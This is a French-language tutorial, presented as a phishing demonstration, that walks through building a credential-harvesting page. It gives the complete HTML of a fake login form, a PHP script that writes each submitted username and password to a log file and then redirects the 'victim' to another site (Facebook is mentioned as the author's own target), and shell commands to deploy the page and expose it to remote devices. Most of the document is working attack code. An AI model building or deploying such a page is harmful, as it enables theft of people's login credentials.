PHISHING DEMONSTRATION

Formulaire de connexion

Création d'un formulaire de connexion "index.html" :

<html>
	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<title>Le Phishing pour les Nuls</title>
	</head>
	<body>
		<form action="script.php" method="post">
			<table align="center" border="0">
				<tr>
					<td>Login :</td>
					<td>
						<input type="text" name="username" id="username" value="" size="25" maxlength="40" />
					</td>
				</tr>
				<tr>
					<td>Password :</td>
					<td><input type="password" name="password" value="" size="25" maxlength="32" /></td>
				</tr>
				<tr>
					<td colspan="2" align="center">
					<br><input type="submit" value="Envoi">
					</td>
				</tr>
			</table>
		</form>
	</body>
</html>
            	

Script de récupération

Création d'un script de récupération des informations "script.php" :

<?php // Ce script va ouvrir un fichier log.txt, inscrire les données du formulaire et refermer le fichier.
	$fp = fopen ("log.txt", "a");
	fputs($fp, "\n");
	fputs ($fp, "login : ".$_POST['username']);
	fputs ($fp, " / password : ".$_POST['password']);
	fclose ($fp);
?>
<?php // Ce script va faire une redirection automatique vers l'adresse de mon choix (ici : developer.yahoo.com/hacku)
	header('Location: http://developer.yahoo.com/hacku/index.html'); // dans mon cas http://www.facebook.com
exit;
?>
				

Fichier texte "log.txt"

Création d'un fichier texte "log.txt" vide :

touch path/to/log.txt
				

Gestion des droits

Pour éviter tout message d'erreur, on va donner un accès total au répertoire.
Placez-vous dans le répertoire parent de votre répertoire contenant les 3 scripts.
Dans mon exemple, mon site est localisé sur /var/www/html/phishing.
Ainsi,

cd /var/www/html
chmod -R 755 phishing/
				

On peut maintenant accéder au site via http://localhost/phishing ou http://127.0.0.1/phishing.
On peut également y accéder depuis un périphérique distant via http://yourip/phishing.

Test

Quand le formulaire s'affiche à l'écran, remplissez-le avec les données que vous voulez et validez. Si tout fonctionne bien, vous serez redirigé vers la page "Hack U" de Yahoo! et vous pourrez vérifier ensuite que ces données ont bien été enregistrées dans le fichier "log.txt".

Dans cet exemple très basique, les login et password de la victime sont simplement interceptés par le serveur hébergeant le formulaire, et la victime va être redirigée vers une page de mon choix. Autrement dit, le fait de valider le formulaire en cliquant sur "envoi" ne va, en réalité, pas lui permettre de se connecter à un site ni sur sa boîte e-mail ! Si elle a fait une erreur de frappe en entrant ses données, il n'y aura aucun message d'erreur, ce qui peut évidemment lui mettre la puce à l'oreille !